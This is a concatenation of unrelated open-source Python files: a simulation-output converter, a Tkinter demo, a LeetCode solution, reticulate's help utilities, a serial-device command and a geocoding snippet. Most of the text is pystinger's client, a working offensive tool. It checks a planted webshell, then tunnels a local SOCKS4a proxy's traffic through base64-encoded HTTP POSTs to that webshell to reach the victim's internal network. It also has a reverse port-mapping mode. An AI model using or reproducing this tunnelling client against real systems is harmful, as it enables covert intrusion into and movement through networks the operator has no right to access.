times_file = open(os.path.join(dir,'times'), 'w')
for entity in entities:
print(' entity:', entity)
for proc in procs:
print(' proc:', proc)
print(' timesteps:', len(times))
f = '%s_%s_%s_'%(solver,proc,entity)
of = os.path.join(dir,f)
for i, time in enumerate(times):
print('\r',i,)
if skip_existing and os.path.exists(f+str(i)):
continue
d = load(os.path.join(path, f+time+'.npz'))
arrs = {}
for nam,val in d.items():
if val.ndim > 0:
arrs[nam] = val
d.close()
scalars, vectors, tensors = detect_vectors_tensors(arrs)
vectors['V'] = ['u','v','w']
z = zeros_like(arrs['x'])
if 'v' not in arrs:
arrs['v'] = z
if 'w' not in arrs:
arrs['w'] = z
write_vtk(arrs, of+str(i),
scalars=scalars, vectors=vectors, tensors=tensors,
data_mode=data_mode)
times_file.write('%d\t%s\n'%(i,time))
times_file.close()
def extract_text(path, particle_idx, props=['x','y','u','v','p','rho','sigma00','sigma01','sigma11'], ent=None, solvers=None):
if solvers:
raise NotImplementedError
else:
solvers = get_output_details(path)
for solver, (procs, entities, times) in solvers.items():
print('converting solver:', solver)
dir = os.path.join(path,solver+'_vtk')
if not os.path.exists(dir):
os.mkdir(dir)
procs = sorted(procs)
entities = sorted(entities)
times = sorted(times, key=float)
times_file = open(os.path.join(dir,'times'), 'w')
e = ent
if ent is None:
e = entities
for entity in entities:
if entity not in e:
continue
print(' entity:', entity)
for proc in procs:
print(' proc:', proc)
print(' timesteps:', len(times))
f = '%s_%s_%s_'%(solver,proc,entity)
of = os.path.join(dir,f)
files = [open(os.path.join(path,f+'%d.dat'%particle_id), 'w') for particle_id in particle_idx]
print(files)
for file in files:
file.write('i\tt\t'+'\t'.join(props))
for i, time in enumerate(times):
print('\r',i,)
d = load(os.path.join(path, f+time+'.npz'))
s = '\n%d\t%s'%(i,time)
for j,file in enumerate(files):
file.write(s)
for prop in props:
file.write('\t')
file.write(str(d[prop][particle_idx[j]]))
d.close()
for file in files:
file.close()
def test():
l = ['x'+str(i) for i in range(3)]
l.append('a0')
l.append('a1')
for i in range(3):
for j in range(3):
if i == j:
l.append('XX%d'%i)
if i <= j:
l.append('S%d%d'%(i,j))
l.append('T%d%d'%(i,j))
scalars, vectors, tensors = detect_vectors_tensors(l)
assert set(scalars) == set(['a0','a1'])
assert set(vectors) == set(['x','XX'])
assert set(tensors) == set(['S','T'])
if __name__ == '__main__':
import sys
pysph_to_vtk(path=sys.argv[1])
|
brml/multpots.py | herupraptono/pybrml | 136 | 12776553 | <reponame>herupraptono/pybrml
#!/usr/bin/env python
"""
MULTPOTS Multiply potentials into a single potential
newpot = multpots(pots)
multiply potentials : pots is a cell of potentials
potentials with empty tables are ignored
if a table of type 'zero' is encountered, the result is a table of type
'zero' with table 0, and empty variables.
"""
def multpots(pots):
# import copy
newpot = pots[0]
for i in range(1, len(pots)): # loop over all the potentials
#FIX ME: did not check dimension consistency
newpot = newpot*pots[i]
return newpot
|
Chapter06/Ch6/demo/indexing.py | henrryyanez/Tkinter-GUI-Programming-by-Example | 127 | 12776563 | import tkinter as tk
win = tk.Tk()
current_index = tk.StringVar()
text = tk.Text(win, bg="white", fg="black")
lab = tk.Label(win, textvar=current_index)
def update_index(event=None):
cursor_position = text.index(tk.INSERT)
cursor_position_pieces = str(cursor_position).split('.')
cursor_line = cursor_position_pieces[0]
cursor_char = cursor_position_pieces[1]
current_index.set('line: ' + cursor_line + ' char: ' + cursor_char + ' index: ' + str(cursor_position))
text.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
lab.pack(side=tk.BOTTOM, fill=tk.X, expand=1)
text.bind('<KeyRelease>', update_index)
win.mainloop()
|
python/234_Palindrome_Linked_List.py | dvlpsh/leetcode-1 | 4,416 | 12776583 | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
# def __init__(self):
# self.curr_head = None
#
# def isPalindrome(self, head):
# """
# :type head: ListNode
# :rtype: bool
# """
# self.curr_head = head
# return self.check(head)
#
# def check(self, node):
# if node is None:
# return True
# isPal = self.check(node.next) and (self.curr_head.val == node.val)
# self.curr_head = self.curr_head.next
# return isPal
def isPalindrome(self, head):
# p2 is 2 times faster than p3
# p1 and pre is used to reverse the first half of the list
# so when the first while is over
# p1 is in the middle
# p3 is in middle + 1
# p2 is in the end
if head is None:
return True
p1, p2 = head, head
p3, pre = p1.next, p1
while p2.next is not None and p2.next.next is not None:
p2 = p2.next.next
pre = p1
p1 = p3
p3 = p3.next
p1.next = pre
if p2.next is None:
p1 = p1.next
while p3 is not None:
if p1.val != p3.val:
return False
p1 = p1.next
p3 = p3.next
return True |
inst/python/rpytools/help.py | flyaflya/reticulate | 1,476 | 12776592 |
import sys
import types
import inspect
def isstring(s):
# if we use Python 3
if (sys.version_info[0] >= 3):
return isinstance(s, str)
# we use Python 2
return isinstance(s, basestring)
def normalize_func(func):
# return None for builtins
if (inspect.isbuiltin(func)):
return None
return func
def get_doc(func):
doc = inspect.getdoc(func)
if doc is None:
func = normalize_func(func)
if func is None:
return None
else:
doc = inspect.getdoc(func)
return doc
def get_property_doc(target, prop):
for name, obj in inspect.getmembers(type(target), inspect.isdatadescriptor):
if (isinstance(obj, property) and name == prop):
return inspect.getdoc(obj.fget)
return None
def get_argspec(func):
try:
if sys.version_info[0] >= 3:
return inspect.getfullargspec(func)
else:
return inspect.getargspec(func)
except TypeError:
return None
def get_arguments(func):
func = normalize_func(func)
if func is None:
return None
argspec = get_argspec(func)
if argspec is None:
return None
args = argspec.args
if 'self' in args:
args.remove('self')
return args
def get_r_representation(default):
if callable(default) and hasattr(default, '__name__'):
arg_value = default.__name__
else:
if default is None:
arg_value = "NULL"
elif type(default) == type(True):
if default == True:
arg_value = "TRUE"
else:
arg_value = "FALSE"
elif isstring(default):
arg_value = "\"%s\"" % default
elif isinstance(default, int):
arg_value = "%rL" % default
elif isinstance(default, float):
arg_value = "%r" % default
elif isinstance(default, list):
arg_value = "c("
for i, item in enumerate(default):
if i is (len(default) - 1):
arg_value += "%s)" % get_r_representation(item)
else:
arg_value += "%s, " % get_r_representation(item)
elif isinstance(default, (tuple, set)):
arg_value = "list("
for i, item in enumerate(default):
if i is (len(default) - 1):
arg_value += "%s)" % get_r_representation(item)
else:
arg_value += "%s, " % get_r_representation(item)
elif isinstance(default, dict):
arg_value = "list("
for i in range(len(default)):
i_arg_value = "%s = %s" % \
(default.keys()[i], get_r_representation(default.values()[i]))
if i is (len(default) - 1):
arg_value += "%s)" % i_arg_value
else:
arg_value += "%s, " % i_arg_value
else:
arg_value = "%r" % default
# if the value starts with "tf." then convert to $ usage
if (arg_value.startswith("tf.")):
arg_value = arg_value.replace(".", "$")
return(arg_value)
def generate_signature_for_function(func):
"""Given a function, returns a string representing its args."""
func = normalize_func(func)
if func is None:
return None
args_list = []
argspec = get_argspec(func)
if argspec is None:
return None
first_arg_with_default = (
len(argspec.args or []) - len(argspec.defaults or []))
for arg in argspec.args[:first_arg_with_default]:
if arg == "self":
# Python documentation typically skips `self` when printing method
# signatures.
continue
args_list.append(arg)
if argspec.varargs == "args" and hasattr(argspec, 'keywords') and argspec.keywords == "kwds":
original_func = func.__closure__[0].cell_contents
return generate_signature_for_function(original_func)
if argspec.defaults:
for arg, default in zip(
argspec.args[first_arg_with_default:], argspec.defaults):
arg_value = get_r_representation(default)
args_list.append("%s = %s" % (arg, arg_value))
if argspec.varargs:
args_list.append("...")
if hasattr(argspec, 'keywords') and argspec.keywords:
args_list.append("...")
return "(" + ", ".join(args_list) + ")"
|
bibliopixel/commands/devices.py | rec/leds | 253 | 12776594 | <reponame>rec/leds
"""
Find serial devices and update serial device IDs
"""
from .. util import log
CONNECT_MESSAGE = """
Connect just one Serial device (AllPixel) and press enter..."""
def run(args):
from ..drivers.serial.driver import Serial
from ..drivers.serial.devices import Devices
import serial
run = True
log.printer("Press Ctrl+C any time to exit.")
try:
while run:
try:
input(CONNECT_MESSAGE)
devices = Devices(args.hardware_id, args.baud)
ports = devices.find_serial_devices()
if not ports:
log.printer("No serial devices found. Please connect one.")
continue
port = sorted(ports.items())[0][1][0]
id = devices.get_device_id(port)
log.printer("Device ID of {}: {}".format(port, id))
newID = input("Input new ID (enter to skip): ")
if newID != '':
try:
newID = int(newID)
if newID < 0 or newID > 255:
raise ValueError()
devices.set_device_id(port, newID)
id = devices.get_device_id(port)
log.printer("Device ID set to: %s" % id)
except ValueError:
log.printer("Please enter a number between 0 and 255.")
except serial.SerialException as e:
log.printer("Problem connecting to serial device. %s" % e)
except Exception as e:
log.printer('Programmer error with exception %s' % e)
except KeyboardInterrupt:
pass
def add_arguments(parser):
parser.set_defaults(run=run)
parser.add_argument('--hardware-id', default='1D50:60AB',
help='USB Vendor ID : Product ID of device. '
'Defaults to VID:PID for AllPixel')
parser.add_argument('--baud', default=921600, type=int,
help='Serial baud rate.')
|
chapter13/asyncgmaps.py | lixin940207/expert_python_programming | 189 | 12776622 | <reponame>lixin940207/expert_python_programming<gh_stars>100-1000
# -*- coding: utf-8 -*-
import aiohttp
session = aiohttp.ClientSession()
async def geocode(place):
params = {
'sensor': 'false',
'address': place
}
async with session.get(
'https://maps.googleapis.com/maps/api/geocode/json',
params=params
) as response:
result = await response.json()
return result['results']
|
stinger_client.py | wisdark/pystinger | 973 | 12776649 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
# @File : client.py
# @Date : 2019/8/28
# @Desc :
# @license : Copyright(C), funnywolf
# @Author: funnywolf
# @Contact : github.com/FunnyWolf
import argparse
import struct
import threading
import time
from socket import AF_INET, SOCK_STREAM
from threading import Thread
import ipaddr
from config import *
try:
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
except Exception as E:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
global globalClientCenter
class ClientCenter(threading.Thread):
def __init__(self):
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
"Connection": "keep-alive",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8",
'Accept-Encoding': 'gzip',
}
self.proxy = None
self.CACHE_CONNS = {}
self.MIRROR_CHCHE_CONNS = {}
# {
# "conn": self.request,
# "targetaddr": TARGET_ADDR,
# "new": True,
# }
# socket参数
self.LOCAL_ADDR = None
self.READ_BUFF_SIZE = 11200
self.POST_RETRY_COUNT = 10 # post请求重试最大次数
# 日志参数
self.LOG_LEVEL = "INFO"
self.logger = get_logger(level=self.LOG_LEVEL, name="StreamLogger")
# webshell参数
self.WEBSHELL = None
self.REMOTE_SERVER = None
self.SINGLE_MODE = False
# mirror
self.SOCKET_TIMEOUT = DEFAULT_SOCKET_TIMEOUT
self.TARGET_IP = "127.0.0.1"
self.TARGET_PORT = 60020
# 缓存变量
self.die_client_address = []
self.mirror_die_client_address = []
self.session = requests.session()
self.session.verify = False
# 多线程变量
self.post_send_data = {}
self.post_return_data = {}
threading.Thread.__init__(self)
def custom_header(self, inputstr):
try:
str_headers = inputstr.split(",")
for str_header in str_headers:
header_type = str_header.split(":")[0].strip()
header_value = str_header.split(":")[1].strip()
self.headers[header_type] = header_value
except Exception as E:
self.logger.exception(E)
return False
self.logger.info("------------ Custom Http Request Header ------------")
self.logger.info(self.headers)
self.logger.info("\n")
return True
def custom_proxy(self, proxy):
self.proxy = {'http': proxy, 'https': proxy}
self.session.proxies = self.proxy
self.logger.info("------------ Custom Http Request Proxy ------------")
self.logger.info(self.proxy)
self.logger.info("\n")
return True
def recv_socks_data(self, client_address):
"""socks数据接收"""
client_socket_conn = self.CACHE_CONNS.get(client_address).get("conn")
try:
tcp_recv_data = client_socket_conn.recv(self.READ_BUFF_SIZE)
self.logger.debug("CLIENT_ADDRESS:{} TCP_RECV_DATA:{}".format(client_address, tcp_recv_data))
if len(tcp_recv_data) > 0:
has_data = True
self.logger.info("CLIENT_ADDRESS:{} TCP_RECV_LEN:{}".format(client_address, len(tcp_recv_data)))
except Exception as err:
tcp_recv_data = b""
self.logger.debug("TCP_RECV_NONE")
# 编码问题,data数据(tcp传输的数据)需要额外再base64编码一次
client_socket_targetaddr = self.CACHE_CONNS.get(client_address).get("targetaddr")
# 每一个client_address的数据结构体
client_address_one_data = {
"data": base64.b64encode(tcp_recv_data),
"targetaddr": client_socket_targetaddr,
}
self.post_send_data[client_address] = client_address_one_data
def send_socks_data(self, client_address):
# 将返回的数据发送到client Tcp连接中
# 读取server返回的数据
try:
client_socket_conn = self.CACHE_CONNS.get(client_address).get("conn")
server_tcp_send_data = base64.b64decode(self.post_return_data.get(client_address).get("data"))
except Exception as E:
if self.SINGLE_MODE is True:
self.logger.warning(
"CLIENT_ADDRESS:{} server socket not in client socket list".format(client_address))
self.logger.warning("SINGLE_MODE: {} ,remove is conn from server".format(self.SINGLE_MODE))
self.die_client_address.append(client_address)
return
if server_tcp_send_data == "": # 无数据返回继续下一个连接
return
# 将返回的数据发送到client Tcp连接中
try:
client_socket_conn.send(server_tcp_send_data)
self.logger.debug("CLIENT_ADDRESS:{} TCP_SEND_DATA:{}".format(client_address, server_tcp_send_data))
except Exception as E:
self.logger.warning("CLIENT_ADDRESS:{} Client socket send failed".format(client_address))
self.die_client_address.append(client_address)
try:
self.CACHE_CONNS.pop(client_address)
client_socket_conn.close()
except Exception as E:
pass
def _post_data(self, url, data={}):
"""发送数据到webshell"""
payload = {
"Remoteserver": self.REMOTE_SERVER,
"Endpoint": url,
"SENDDATA": diyEncode(data)
}
self.logger.debug(payload)
for i in range(self.POST_RETRY_COUNT):
try:
# timeout 要大于脚本中post的超时时间
r = self.session.post(self.WEBSHELL, data=payload, verify=False, timeout=15, headers=self.headers)
except Exception as E:
self.logger.warning("Post data to WEBSHELL failed")
self.logger.exception(E)
time.sleep(3) # 错误后延时
continue
try:
web_return_data = diyDecode(r.content)
if isinstance(web_return_data, dict) and web_return_data.get(ERROR_CODE) is not None:
self.logger.error(web_return_data.get(ERROR_CODE))
self.logger.warning(r.content)
return None
else:
return web_return_data
except Exception as E:
self.logger.warning("WEBSHELL return wrong data")
self.logger.debug(r.content)
time.sleep(3) # 错误后延时
continue
# 超过重试次数后,退出
return None
def run(self):
self.logger.warning("LoopThread start")
while True:
self._sync_data()
def _sync_data(self):
has_data = False
# 清除无效的client
for client_address in self.die_client_address:
try:
one = self.CACHE_CONNS.pop(client_address)
one.get("conn").close()
self.logger.warning("CLIENT_ADDRESS:{} close client in die_client_address".format(client_address))
except Exception as E:
self.logger.warning(
"CLIENT_ADDRESS:{} close client close client in die_client_address error".format(client_address))
# 从tcp中读取数据
thread_list = []
self.post_send_data = {}
for client_address in list(self.CACHE_CONNS.keys()):
temp = Thread(target=self.recv_socks_data,
args=(client_address,))
thread_list.append(temp)
for temp in thread_list:
temp.start()
for temp in thread_list:
temp.join()
# 从tcp中读取数据(mirror)
mirror_post_send_data = {}
for mirror_client_address in list(self.MIRROR_CHCHE_CONNS.keys()):
client_socket_conn = self.MIRROR_CHCHE_CONNS.get(mirror_client_address).get("conn")
try:
tcp_recv_data = client_socket_conn.recv(self.READ_BUFF_SIZE)
self.logger.debug("CLIENT_ADDRESS:{} TCP_RECV_DATA:{}".format(mirror_client_address, tcp_recv_data))
if len(tcp_recv_data) > 0:
has_data = True
self.logger.info(
"MIRROR_CLIENT_ADDRESS:{} CLIENT_TCP_RECV_LEN:{}".format(mirror_client_address,
len(tcp_recv_data)))
except Exception as err:
tcp_recv_data = b""
self.logger.debug("TCP_RECV_NONE")
# 每一个client_address的数据结构体
client_address_one_data = {
# 编码问题,data数据(tcp传输的数据)需要额外再base64编码一次
"data": base64.b64encode(tcp_recv_data),
}
mirror_post_send_data[mirror_client_address] = client_address_one_data
# 组装数据
payload = {}
payload[DATA_TAG] = self.post_send_data # 发送的数据
payload[DIE_CLIENT_ADDRESS_TAG] = self.die_client_address # 需要清除的连接
payload[MIRROR_DATA_TAG] = mirror_post_send_data # 发送的数据
payload[MIRROR_DIE_CLIENT_ADDRESS_TAG] = self.mirror_die_client_address # 需要清除的连接
# 发送读取的数据到webshell
return_data = self._post_data(URL_STINGER_SYNC, data=payload)
if return_data is None: # 获取数据失败,退出此次同步
return
# 处理post返回数据
# 读取server返回的数据
self.post_return_data = return_data.get(RETURN_DATA)
self.die_client_address = []
thread_list = []
for client_address in list(self.post_return_data.keys()):
temp = Thread(target=self.send_socks_data,
args=(client_address,))
thread_list.append(temp)
for temp in thread_list:
temp.start()
for temp in thread_list:
temp.join()
# 检查没有在server返回列表中的client
for client_address in list(self.CACHE_CONNS.keys()):
if self.post_return_data.get(client_address) is None:
if self.CACHE_CONNS.get(client_address).get("new") is True:
self.CACHE_CONNS[client_address]["new"] = False
pass
else:
self.logger.warning(
"CLIENT_ADDRESS:{} remove client not in server CHCHE_CONNS".format(client_address)
)
self.logger.warning("CLIENT_ADDRESS:{} append in die_client_address".format(client_address))
self.die_client_address.append(client_address)
# mirror处理
mirror_post_return_data = return_data.get(MIRROR_RETURN_DATA)
self.mirror_die_client_address = []
for mirror_client_address in list(mirror_post_return_data.keys()):
# 处理socket连接
if self.MIRROR_CHCHE_CONNS.get(mirror_client_address) is None:
# 新建链接
try:
server_socket_conn = socket.socket(AF_INET, SOCK_STREAM)
server_socket_conn.settimeout(self.SOCKET_TIMEOUT)
server_socket_conn.connect((self.TARGET_IP, self.TARGET_PORT), ) # json不支持元组,自动转化为list
self.MIRROR_CHCHE_CONNS[mirror_client_address] = {"conn": server_socket_conn}
self.logger.info("MIRROR_CLIENT_ADDRESS:{} Create new tcp socket, TARGET_ADDRESS:{}:{}".format(
mirror_client_address, self.TARGET_IP, self.TARGET_PORT))
except Exception as E:
self.logger.warning(
"MIRROR_CLIENT_ADDRESS:{} TARGET_ADDR:{}:{} Create new socket failed. {}".format(
mirror_client_address,
self.TARGET_IP,
self.TARGET_PORT, E))
self.mirror_die_client_address.append(mirror_client_address)
continue
else:
server_socket_conn = self.MIRROR_CHCHE_CONNS.get(mirror_client_address).get("conn")
# 读取server返回的数据
try:
server_tcp_send_data = base64.b64decode(mirror_post_return_data.get(mirror_client_address).get("data"))
server_socket_conn.send(server_tcp_send_data)
self.logger.debug("MIRROR_CLIENT_ADDRESS:{} SERVER_TCP_SEND_DATA:{}".format(mirror_client_address,
server_tcp_send_data))
if len(server_tcp_send_data) > 0:
self.logger.info(
"MIRROR_CLIENT_ADDRESS:{} SERVER_TCP_SEND_LEN:{}".format(mirror_client_address,
len(server_tcp_send_data)))
except Exception as E:
self.logger.info(
"MIRROR_CLIENT_ADDRESS:{} socket send data failed. {}".format(mirror_client_address, E))
self.mirror_die_client_address.append(mirror_client_address)
one = self.MIRROR_CHCHE_CONNS.pop(mirror_client_address)
one.get("conn").close()
continue
# 检查没有在server返回列表中的client
for mirror_client_address in list(self.MIRROR_CHCHE_CONNS.keys()):
if mirror_post_return_data.get(mirror_client_address) is None:
self.logger.warning(
"MIRROR_CLIENT_ADDRESS:{} remove client not in server MIRROR_CHCHE_CONNS".format(
mirror_client_address)
)
# self.mirror_die_client_address.append(mirror_client_address)
one = self.MIRROR_CHCHE_CONNS.pop(mirror_client_address)
one.get("conn").close()
# 等待时间
if has_data:
wait = 0
else:
wait = return_data.get(WAIT_TIME)
time.sleep(wait)
def setc_webshell(self, WEBSHELL):
try:
r = requests.get(WEBSHELL, verify=False, timeout=3, headers=self.headers, proxies=self.proxy)
if b"UTF-8" in r.content:
self.WEBSHELL = WEBSHELL
return True
else:
return False
except requests.exceptions.ProxyError as proxyError:
self.logger.error("Connet to proxy failed : {}".format(self.proxy))
return False
except Exception as E:
self.logger.exception(E)
return False
def setc_remoteserver(self, remote_server=None):
if remote_server is None:
for port in CONTROL_PORT:
for i in range(2):
self.REMOTE_SERVER = "http://{}:{}".format(LOCALADDR, port)
result = self._post_data(URL_CHECK)
if result is None: # 失败回退
self.REMOTE_SERVER = None
continue
else:
return result
return None
self.REMOTE_SERVER = remote_server
result = self._post_data(URL_CHECK)
if result is None: # 失败回退
self.REMOTE_SERVER = None
return result
def setc_localaddr(self, ip, port):
if port_is_used(port, ip):
return False
else:
self.LOCAL_ADDR = "{}:{}".format(ip, port)
return True
def sets_config(self, tag, data):
payload = {CONFIG_TAG: tag, CONFIG_DATA: data}
web_return_data = self._post_data(URL_SET_CONFIG, payload)
return web_return_data
def send_cmd(self, tag, data=None):
payload = {CONFIG_TAG: tag, CONFIG_DATA: data}
web_return_data = self._post_data(URL_CMD, payload)
return web_return_data
class ClientRequest(object):
'''Represents a client SOCKS4 request'''
def __init__(self, data):
'''Construct a new ClientRequeset from the given raw SOCKS request'''
self.invalid = False
# Client requests must be at least 9 bytes to hold all necessary data
if len(data) < 9:
self.invalid = True
return
# Version number (VN)
self.parse_vn(data)
# SOCKS command code (CD)
self.parse_cd(data)
# Destination port
self.parse_dst_port(data)
# Destination IP / Domain name (if specified)
self.parse_ip(data)
# Userid
self.parse_userid(data)
@classmethod
def parse_fixed(cls, data):
'''Parse and return the fixed-length part of a SOCKS request
Returns a tuple containing (vn, cd, dst_port, dst_ip) given the raw
socks request
'''
return struct.unpack('>BBHL', data[:8])
def parse_vn(self, data):
'''Parse and store the version number given the raw SOCKS request'''
vn, _, _, _ = ClientRequest.parse_fixed(data)
if (vn != CLIENT_VN):
self.invalid = True
def parse_dst_port(self, data):
'''Parse and store the destination port given the raw SOCKS request'''
_, _, dst_port, _ = ClientRequest.parse_fixed(data)
self.dst_port = dst_port
def parse_cd(self, data):
'''Parse and store the request code given the raw SOCKS request'''
_, cd, _, _ = ClientRequest.parse_fixed(data)
if (cd == REQUEST_CD_CONNECT or cd == REQUEST_CD_BIND):
self.cd = cd
else:
self.invalid = True
def parse_ip(self, data):
'''Parse and store the destination ip given the raw SOCKS request
If the IP is of the form 0.0.0.(1-255), attempt to resolve the domain
name specified, then store the resolved ip as the destination ip.
'''
_, _, _, dst_ip = ClientRequest.parse_fixed(data)
ip = ipaddr.IPv4Address(dst_ip)
o1, o2, o3, o4 = ip.packed
# Invalid ip address specifying that we must resolve the domain
# specified in data (As specified in SOCKS4a)
if (o1, o2, o3) == (0, 0, 0) and o4 != 0:
try:
# Variable length part of the request containing the userid
# and domain (8th byte onwards)
userid_and_domain = data[8:]
# Extract the domain to resolve
_, domain, _ = userid_and_domain.split(b'\x00')
except ValueError:
# Error parsing request
self.invalid = True
return
try:
resolved_ip = socket.gethostbyname(domain)
except socket.gaierror:
# Domain name not found
self.invalid = True
return
self.dst_ip = resolved_ip
else:
self.dst_ip = ip.exploded
def parse_userid(self, data):
'''Parse and store the userid given the raw SOCKS request'''
try:
index = data.index(b'\x00')
self.userid = data[8:index]
except ValueError:
self.invalid = True
except IndexError:
self.invalid = True
def isInvalid(self):
'''Returns true if this request is invalid, false otherwise'''
return self.invalid
class Socks4aProxy(threading.Thread):
'''A SOCKS4a Proxy'''
def __init__(self, host="127.0.0.1", port=-1, timeout=0.05, bufsize=BUFSIZE):
'''Create a new SOCKS4 proxy on the specified port'''
self._host = host
self._port = port
self._bufsize = bufsize
self._backlog = BACKLOG
self._timeout = timeout
self.logger = logging.getLogger("StreamLogger")
threading.Thread.__init__(self)
@staticmethod
def build_socks_reply(cd, dst_port=0x0000, dst_ip='0.0.0.0'):
'''
Build a SOCKS4 reply with the specified reply code, destination port and
destination ip.
'''
# dst_ip_bytes = ipaddress.IPv4Address(dst_ip).packed
dst_ip_bytes = ipaddr.IPv4Address(dst_ip).packed
dst_ip_raw, = struct.unpack('>L', dst_ip_bytes)
return struct.pack('>BBHL', SERVER_VN, cd, dst_port, dst_ip_raw)
def run(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((self._host, self._port))
s.listen(self._backlog)
self.logger.warning("socks4a server start on {}:{}".format(self._host, self._port))
except Exception as E:
self.logger.exception(E)
self.logger.error(
"start socks4a server failed on {}:{}, maybe port is using by other process".format(self._host,
self._port))
return False
self.logger.warning("Socks4a ready to accept")
while True:
try:
conn, addr = s.accept()
conn.settimeout(self._timeout)
data = conn.recv(self._bufsize)
# Got a connection, handle it with process_request()
self._process_request(data, conn, addr)
self.logger.info("Socks4a process_request finish")
except KeyboardInterrupt as ki:
self.logger.warning('Caught KeyboardInterrupt, exiting')
s.close()
sys.exit(0)
except Exception as E:
self.logger.exception(E)
try:
conn.close()
except Exception as E:
pass
def _process_request(self, data, client_conn, addr):
'''Process a general SOCKS request'''
client_request = ClientRequest(data)
# Handle invalid requests
if client_request.isInvalid():
client_conn.send(self.build_socks_reply(RESPONSE_CD_REQUEST_REJECTED))
client_conn.close()
return
if client_request.cd == REQUEST_CD_CONNECT:
globalClientCenter.logger.warning('Got connection from {}'.format(addr))
key = "{}:{}".format(addr[0], addr[1])
globalClientCenter.CACHE_CONNS[key] = {
"conn": client_conn,
"targetaddr": (client_request.dst_ip, client_request.dst_port),
"new": True, # 新的连接,第一次检查略过
}
client_conn.settimeout(self._timeout)
client_conn.send(self.build_socks_reply(RESPONSE_CD_REQUEST_GRANTED)) # 处理完成,开始正式连接
else:
self.logger.warning("Socks4a do not support bind request")
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Make sure the stinger_server is running on webserver "
"(stinger_server will listen 127.0.0.1:60010 127.0.0.1:60020)")
parser.add_argument('-w', '--webshell', metavar='http://192.168.3.10:8080/proxy.jsp',
help="webshell url",
required=True)
parser.add_argument('--header', metavar='Authorization: XXX,Cookie: XXX',
help="custom http request header",
default=None)
parser.add_argument('--proxy', metavar='socks5://127.0.0.1:1080',
help="Connect webshell through proxy",
default=None)
parser.add_argument('-l', '--locallistenaddress', metavar='127.0.0.1/0.0.0.0',
help="local listen address for socks4",
default='127.0.0.1')
parser.add_argument('-p', '--locallistenport',
default=10800,
metavar='N',
type=int,
help="local listen port for socks4",
)
parser.add_argument('-st', '--sockettimeout', default=0.2,
metavar="N",
type=float,
help="socket timeout value,the biger the timeout, the slower the transmission speed",
)
parser.add_argument('-ti', '--targetipaddress', metavar='127.0.0.1',
help="reverse proxy target ipaddress",
required=False)
parser.add_argument('-tp', '--targetport', metavar='60020',
help="reverse proxy target port",
required=False)
parser.add_argument('-c', '--cleansockst', default=False,
nargs='?',
metavar="true",
type=bool,
help="clean server exist socket(this will kill other client connect)",
)
parser.add_argument('-sm', '--singlemode', default=False,
nargs='?',
metavar="true",
type=bool,
help="clean server exist socket(this will kill other client connect)",
)
args = parser.parse_args()
WEBSHELL = args.webshell
LISTEN_ADDR = args.locallistenaddress
LISTEN_PORT = args.locallistenport
CLEAN_SOCKET = args.cleansockst
if CLEAN_SOCKET is not False:
CLEAN_SOCKET = True
else:
CLEAN_SOCKET = False
# 处理header参数
globalClientCenter = ClientCenter()
header = args.header
if header is not None:
flag = globalClientCenter.custom_header(header)
if flag is not True:
sys.exit(1)
# 处理proxy参数
proxy = args.proxy
if proxy is not None:
flag = globalClientCenter.custom_proxy(proxy)
if flag is not True:
sys.exit(1)
# 处理singlemode参数
SINGLE_MODE = args.singlemode
if SINGLE_MODE is not False:
SINGLE_MODE = True
globalClientCenter.SINGLE_MODE = SINGLE_MODE
globalClientCenter.logger.info("SINGLE_MODE : {}".format(SINGLE_MODE))
else:
SINGLE_MODE = False
# 本地端口检查
globalClientCenter.logger.info("------------------- Local check -------------------")
flag = globalClientCenter.setc_localaddr(LISTEN_ADDR, LISTEN_PORT)
if flag:
globalClientCenter.logger.info("Local listen check : pass")
else:
globalClientCenter.logger.error(
"Local listen check failed, please check if {}:{} is available".format(LISTEN_ADDR, LISTEN_PORT))
globalClientCenter.logger.error(WEBSHELL)
sys.exit(1)
# 检查webshell是否可用
webshell_alive = globalClientCenter.setc_webshell(WEBSHELL)
if webshell_alive:
globalClientCenter.logger.info("WEBSHELL check : pass")
globalClientCenter.logger.info("WEBSHELL: {}".format(WEBSHELL))
else:
globalClientCenter.logger.error("WEBSHELL check failed!")
globalClientCenter.logger.error(WEBSHELL)
sys.exit(1)
# 检查stinger_server是否可用
result = globalClientCenter.setc_remoteserver()
if result is None:
globalClientCenter.logger.error("Read REMOTE_SERVER failed,please check whether server is running")
sys.exit(1)
else:
MIRROR_LISTEN = "127.0.0.1:60020"
globalClientCenter.logger.info("REMOTE_SERVER check : pass")
globalClientCenter.logger.info("\n")
globalClientCenter.logger.info("------------------- Get Sever Config -------------------")
for key in result:
globalClientCenter.logger.info("{} : {}".format(key, result.get(key)))
if key == "MIRROR_LISTEN":
MIRROR_LISTEN = result.get(key)
globalClientCenter.logger.info("\n")
globalClientCenter.logger.info("------------------- Set Server Config -------------------")
# 是否清理已有连接
if CLEAN_SOCKET:
flag = globalClientCenter.send_cmd("CLEAN_SOCKET")
globalClientCenter.logger.info("CLEAN_SOCKET cmd : {}".format(flag))
# server建立内网tcp连接的超时时间
sockettimeout = args.sockettimeout
if sockettimeout != DEFAULT_SOCKET_TIMEOUT:
flag = globalClientCenter.sets_config("SOCKET_TIMEOUT", sockettimeout)
globalClientCenter.logger.info("Set server SOCKET_TIMEOUT => {}".format(flag))
globalClientCenter.SOCKET_TIMEOUT = sockettimeout
globalClientCenter.logger.info("\n")
# 映射到本地的地址
TARGET_IP = args.targetipaddress
if TARGET_IP is None:
globalClientCenter.TARGET_IP = MIRROR_LISTEN.split(":")[0]
else:
globalClientCenter.TARGET_IP = TARGET_IP
# 映射到本地的端口
TARGET_PORT = args.targetport
if TARGET_PORT is None:
globalClientCenter.TARGET_PORT = int(MIRROR_LISTEN.split(":")[1])
else:
globalClientCenter.TARGET_PORT = int(TARGET_PORT)
